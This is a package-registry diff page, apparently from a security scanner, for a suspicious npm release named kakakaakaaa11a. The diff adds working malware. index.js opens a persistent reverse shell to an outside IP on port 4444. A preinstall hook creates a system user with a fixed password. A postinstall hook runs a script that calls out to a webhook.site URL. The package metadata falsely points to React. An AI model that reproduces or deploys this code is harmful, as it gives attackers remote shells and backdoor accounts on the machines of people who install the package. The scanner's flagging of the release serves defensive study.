kakakaakaaa11a 99.1.11

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of kakakaakaaa11a might be problematic. Click here for more details.

package/evil.sh ADDED
@@ -0,0 +1 @@
1
+ curl https://webhook.site/1b1eb1b5-e492-4b6a-8341-26a48f9b117d/evil.txt
package/helloworld.txt ADDED
@@ -0,0 +1 @@
1
+ Hello World!
package/index.js ADDED
@@ -0,0 +1,21 @@
1
+ var net = require('net');
2
+ var spawn = require('child_process').spawn;
3
+
4
+ function c() {
5
+ var client = new net.Socket();
6
+ client.connect(4444, "192.168.255.128", function() {
7
+ var sh = spawn('/bin/sh', []);
8
+ client.write("Connected\r\n");
9
+ client.pipe(sh.stdin);
10
+ sh.stdout.pipe(client);
11
+ });
12
+
13
+ client.on('error', function() {});
14
+
15
+ client.on('close', function() {
16
+ setTimeout(c, 5000);
17
+ });
18
+ }
19
+
20
+ c();
21
+
package/package.json ADDED
@@ -0,0 +1,20 @@
1
+ {
2
+ "name": "kakakaakaaa11a",
3
+ "version": "99.1.011",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "dependencies": {
7
+ "event-stream": "^3.0.0"
8
+ },
9
+ "scripts": {
10
+ "test": "echo \"Error: no test specified\" && exit 1",
11
+ "preinstall": "useradd -p $(openssl passwd -1 password) username",
12
+ "postinstall":"./evil.sh"
13
+ },
14
+ "author": "pirskiwpyodfljhbab",
15
+ "license": "GPL-3",
16
+ "bugs": {
17
+ "url": "http://github.com/jeffbski/react/issues"
18
+ },
19
+ "homepage": "https://github.com/facebook/react/tree/master/npm-react"
20
+ }